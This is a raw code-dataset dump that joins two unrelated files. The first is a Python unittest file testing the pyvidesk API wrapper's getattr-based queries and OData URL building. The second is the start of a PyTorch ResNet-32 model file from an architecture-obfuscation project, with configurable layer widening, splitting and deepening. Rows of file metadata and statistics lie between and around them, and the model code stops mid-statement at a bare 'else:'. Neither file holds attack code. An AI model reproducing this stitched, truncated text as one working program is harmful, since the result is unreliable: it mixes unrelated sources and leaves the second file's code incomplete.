] | 2 | 2020-11-23T18:09:14.000Z | 2020-11-24T16:37:25.000Z | tests/test_entity_getattr.py | MuriloScarpaSitonio/pyvidesk | 0d2366db0899b0ab7425d09f306b4f6d4722f843 | [
"MIT"
] | 5 | 2020-10-14T17:08:59.000Z | 2022-03-04T12:55:14.000Z | import unittest
from pyvidesk import Pyvidesk
from pyvidesk.persons import Persons
from pyvidesk.services import Services
from pyvidesk.tickets import Tickets
from tests.config import TOKEN
class TestEntityGetAttr(unittest.TestCase):
"""Classe que testa o método __getattr__ de entity"""
pyvidesk = Pyvidesk(token=TOKEN)
def test_pyvidesk_persons_instance_is_Persons_class(self):
self.assertIsInstance(self.pyvidesk.persons, Persons)
def test_pyvidesk_tickets_instance_is_Tickets_class(self):
self.assertIsInstance(self.pyvidesk.tickets, Tickets)
def test_pyvidesk_services_instance_is_Services_class(self):
self.assertIsInstance(self.pyvidesk.services, Services)
def test_get_by_id_Persons_class(self):
person_id = "346669244"
person = self.pyvidesk.persons.get_by_id(person_id)
self.assertEqual(person.id, person_id)
def test_get_by_id_Persons_class_with_kwarg(self):
person_id = "346669244"
person = self.pyvidesk.persons.get_by_id(id=person_id)
self.assertEqual(person.id, person_id)
def test_get_by_id_Persons_class_with_select(self):
person_id = "346669244"
select_values = ("id", "businessName", "userName")
person = self.pyvidesk.persons.get_by_id(person_id, select=select_values)
self.assertEqual(person.id, person_id)
self.assertTrue(all(key in select_values for key in person._properties))
def test_get_by_id_Persons_class_with_kwarg_with_select(self):
person_id = "346669244"
select_values = ("id", "businessName", "userName")
person = self.pyvidesk.persons.get_by_id(id=person_id, select=select_values)
self.assertEqual(person.id, person_id)
self.assertTrue(all(key in select_values for key in person._properties))
def test_get_by_getattr_Persons_class(self):
result = self.pyvidesk.persons.get_by_isActive(True).as_url()
expected = self.pyvidesk.persons.api.base_url + "&$filter=isActive eq true"
self.assertEqual(result, expected)
def test_get_by_getattr_Persons_class_with_kwarg(self):
result = self.pyvidesk.persons.get_by_isActive(isActive=True).as_url()
expected = self.pyvidesk.persons.api.base_url + "&$filter=isActive eq true"
self.assertEqual(result, expected)
def test_get_by_getattr_Persons_class_with_select_as_str(self):
select_values = "businessName"
result = self.pyvidesk.persons.get_by_isActive(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$select=businessName&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Persons_class_with_select_as_property(self):
select_values = self.pyvidesk.persons.get_properties()["businessName"]
result = self.pyvidesk.persons.get_by_isActive(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$select=businessName&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Persons_class_with_select_as_iterable_of_str(self):
select_values = ("id", "businessName", "userName", "isActive")
result = self.pyvidesk.persons.get_by_isActive(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$select=id,businessName,userName,isActive&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Persons_class_with_select_as_iterable_of_properties(self):
"""Teste com select como uma tupla de propriedades"""
properties = self.pyvidesk.persons.get_properties()
select_values = (
properties["id"],
properties["businessName"],
properties["userName"],
properties["isActive"],
)
result = self.pyvidesk.persons.get_by_isActive(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$select=id,businessName,userName,isActive&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_getattr_Persons_class_with_kwarg_with_select_as_iterable_of_strings(self):
select_values = ("id", "businessName", "userName", "isActive")
result = self.pyvidesk.persons.get_by_isActive(
isActive=True, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$select=id,businessName,userName,isActive&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_getattr_Persons_class_with_top(self):
result = self.pyvidesk.persons.get_by_isActive(True, top=100).as_url()
expected = (
self.pyvidesk.persons.api.base_url + "&$top=100&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_getattr_Persons_class_with_skip(self):
result = self.pyvidesk.persons.get_by_isActive(True, skip=100).as_url()
expected = (
self.pyvidesk.persons.api.base_url + "&$skip=100&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_getattr_Persons_class_with_top_with_select(self):
select_values = ("id", "businessName", "userName", "isActive")
result = self.pyvidesk.persons.get_by_isActive(
True, top=100, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$top=100&$select=id,businessName,userName,isActive&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_getattr_Persons_class_with_top_with_select_with_skip(
self,
):
"""Teste com select, top e skip"""
select_values = ("id", "businessName", "userName", "isActive")
result = self.pyvidesk.persons.get_by_isActive(
True, top=100, skip=40, select=select_values
).as_url()
expected = self.pyvidesk.persons.api.base_url + (
"&$top=100&$skip=40"
"&$select=id,businessName,userName,isActive"
"&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_get_by_id_Tickets_class(self):
ticket_id = 3
ticket = self.pyvidesk.tickets.get_by_id(ticket_id)
# TODO: olhar o arquivo tickets.py
self.assertEqual(int(ticket.id), ticket_id)
def test_get_by_id_Tickets_class_with_kwarg(self):
ticket_id = 3
ticket = self.pyvidesk.tickets.get_by_id(id=ticket_id)
# TODO: olhar o arquivo tickets.py
self.assertEqual(int(ticket.id), ticket_id)
def test_get_by_id_Tickets_class_with_select(self):
ticket_id = 3
select_values = ("id", "subject", "createdDate")
ticket = self.pyvidesk.tickets.get_by_id(ticket_id, select=select_values)
self.assertEqual(ticket.id, ticket_id)
self.assertTrue(all(key in select_values for key in ticket._properties))
def test_get_by_id_Tickets_class_with_kwarg_with_select(self):
ticket_id = 3
select_values = ("id", "subject", "createdDate")
ticket = self.pyvidesk.tickets.get_by_id(id=ticket_id, select=select_values)
self.assertEqual(ticket.id, ticket_id)
self.assertTrue(all(key in select_values for key in ticket._properties))
def test_get_by_getattr_Tickets_class(self):
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(True).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Tickets_class_with_kwarg(self):
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
slaSolutionDateIsPaused=True
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Tickets_class_with_select_as_str(self):
select_values = "subject"
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$select=subject&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Tickets_class_with_select_as_property(self):
select_values = self.pyvidesk.tickets.get_properties()["subject"]
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$select=subject&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Tickets_class_with_select_as_iterable_of_str(self):
"""
Teste quando select é uma tupla de strings.
"""
select_values = ("id", "subject", "createdDate", "slaSolutionDateIsPaused")
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$select=id,subject,createdDate,slaSolutionDateIsPaused"
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Tickets_class_with_select_as_iterable_of_properties(self):
"""Teste com select como uma tupla de propriedades"""
properties = self.pyvidesk.tickets.get_properties()
select_values = (
properties["id"],
properties["subject"],
properties["createdDate"],
properties["slaSolutionDateIsPaused"],
)
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$select=id,subject,createdDate,slaSolutionDateIsPaused"
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_getattr_Tickets_class_with_kwarg_with_select_as_iterable_of_strings(self):
"""
Teste quando select é uma tupla de strings e há um kwarg para o parametro principal.
"""
select_values = ("id", "subject", "createdDate", "slaSolutionDateIsPaused")
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
slaSolutionDateIsPaused=True, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$select=id,subject,createdDate,slaSolutionDateIsPaused"
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_getattr_Tickets_class_with_top(self):
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, top=100
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$top=100&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_getattr_Tickets_class_with_skip(self):
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, skip=100
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$skip=100&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_getattr_Tickets_class_with_top_with_select(self):
"""
Teste quando select é e top são utilizados.
"""
select_values = ("id", "subject", "createdDate", "slaSolutionDateIsPaused")
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, top=100, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$top=100&$select=id,subject,createdDate,slaSolutionDateIsPaused"
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_getattr_Tickets_class_with_top_with_select_with_skip(
self,
):
"""Teste com select, top e skip"""
select_values = ("id", "subject", "createdDate", "slaSolutionDateIsPaused")
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, top=100, skip=40, select=select_values
).as_url()
expected = self.pyvidesk.tickets.api.base_url + (
"&$top=100&$skip=40"
"&$select=id,subject,createdDate,slaSolutionDateIsPaused"
"&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
| 41.049383 | 92 | 0.663609 | 1,509 | 13,300 | 5.562624 | 0.059642 | 0.084346 | 0.065642 | 0.044556 | 0.933881 | 0.925304 | 0.909221 | 0.886586 | 0.879438 | 0.829878 | 0 | 0.009466 | 0.237444 | 13,300 | 323 | 93 | 41.176471 | 0.818182 | 0.033158 | 0 | 0.6 | 0 | 0 | 0.148006 | 0.095432 | 0 | 0 | 0 | 0.003096 | 0.137037 | 1 | 0.122222 | false | 0 | 0.022222 | 0 | 0.151852 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
351e477005fba1c3e1200b6a5c656fba719ae52d | 194,595 | py | Python | seq_obfuscator/model_file/model_8_obf.py | zlijingtao/Neurobfuscator | 39fc8eaa1819bdaba4a64ca86cd5a340343ac94a | [
"Apache-2.0"
] | 3 | 2021-07-20T21:01:43.000Z | 2022-01-02T03:33:05.000Z | seq_obfuscator/model_file/model_8_obf.py | zlijingtao/Neurobfuscator | 39fc8eaa1819bdaba4a64ca86cd5a340343ac94a | [
"Apache-2.0"
] | null | null | null | seq_obfuscator/model_file/model_8_obf.py | zlijingtao/Neurobfuscator | 39fc8eaa1819bdaba4a64ca86cd5a340343ac94a | [
"Apache-2.0"
] | 1 | 2021-12-10T03:15:52.000Z | 2021-12-10T03:15:52.000Z | import numpy as np
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
assert torch.cuda.is_available()
cuda_device = torch.device("cuda") # device object representing GPU
#This model stands for resnet-32 on CIFAR-100
#model_id = 7 (1 less than the file name)
class custom_cnn_7(torch.nn.Module):
def __init__(self, input_features, reshape = True, widen_list = None, decompo_list = None, dummy_list = None, deepen_list = None, skipcon_list = None, kerneladd_list = None):
super(custom_cnn_7,self).__init__()
self.reshape = reshape
self.widen_list = widen_list
self.decompo_list = decompo_list
self.dummy_list = dummy_list
self.deepen_list = deepen_list
self.skipcon_list = skipcon_list
self.kerneladd_list = kerneladd_list
self.relu = torch.nn.ReLU(inplace=True)
self.logsoftmax = torch.nn.LogSoftmax(dim = 1)
self.maxpool2x2 = torch.nn.MaxPool2d(kernel_size=2, stride=2)
self.avgpool = torch.nn.AvgPool2d(8)
params = [3, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[0] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[0] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[0] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[0])
params[3] = params[3] + 2* int(self.kerneladd_list[0])
params[6] = params[6] + int(self.kerneladd_list[0])
params[7] = params[7] + int(self.kerneladd_list[0])
if self.decompo_list != None:
if self.decompo_list[0] == 1:
self.conv0_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv0_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[0] == 2:
self.conv0_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv0_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv0_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv0_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv0 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv0 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[0] == 1:
self.conv0_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[0] == 1:
self.conv0_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn0 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[0] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[0] / 4) * 4)
if self.widen_list[1] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[1] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[1] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[1])
params[3] = params[3] + 2* int(self.kerneladd_list[1])
params[6] = params[6] + int(self.kerneladd_list[1])
params[7] = params[7] + int(self.kerneladd_list[1])
if self.decompo_list != None:
if self.decompo_list[1] == 1:
self.conv1_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[1] == 2:
self.conv1_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[1] == 3:
self.conv1_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[1] == 4:
self.conv1_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv1_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv1 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv1 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[1] == 1:
self.conv1_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[1] == 1:
self.conv1_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn1 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[1] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[1] / 4) * 4)
if self.widen_list[2] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[2] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[2] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[2])
params[3] = params[3] + 2* int(self.kerneladd_list[2])
params[6] = params[6] + int(self.kerneladd_list[2])
params[7] = params[7] + int(self.kerneladd_list[2])
if self.decompo_list != None:
if self.decompo_list[2] == 1:
self.conv2_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[2] == 2:
self.conv2_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[2] == 3:
self.conv2_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[2] == 4:
self.conv2_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv2_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv2 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv2 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[2] == 1:
self.conv2_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[2] == 1:
self.conv2_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn2 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[2] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[2] / 4) * 4)
if self.widen_list[3] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[3] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[3] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[3])
params[3] = params[3] + 2* int(self.kerneladd_list[3])
params[6] = params[6] + int(self.kerneladd_list[3])
params[7] = params[7] + int(self.kerneladd_list[3])
if self.decompo_list != None:
if self.decompo_list[3] == 1:
self.conv3_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[3] == 2:
self.conv3_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[3] == 3:
self.conv3_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[3] == 4:
self.conv3_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv3_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv3 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv3 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[3] == 1:
self.conv3_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[3] == 1:
self.conv3_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn3 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[3] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[3] / 4) * 4)
if self.widen_list[4] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[4] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[4] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[4])
params[3] = params[3] + 2* int(self.kerneladd_list[4])
params[6] = params[6] + int(self.kerneladd_list[4])
params[7] = params[7] + int(self.kerneladd_list[4])
if self.decompo_list != None:
if self.decompo_list[4] == 1:
self.conv4_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[4] == 2:
self.conv4_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[4] == 3:
self.conv4_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[4] == 4:
self.conv4_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv4_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv4 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv4 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[4] == 1:
self.conv4_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[4] == 1:
self.conv4_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn4 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[4] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[4] / 4) * 4)
if self.widen_list[5] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[5] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[5] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[5])
params[3] = params[3] + 2* int(self.kerneladd_list[5])
params[6] = params[6] + int(self.kerneladd_list[5])
params[7] = params[7] + int(self.kerneladd_list[5])
if self.decompo_list != None:
if self.decompo_list[5] == 1:
self.conv5_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[5] == 2:
self.conv5_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[5] == 3:
self.conv5_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[5] == 4:
self.conv5_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv5_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
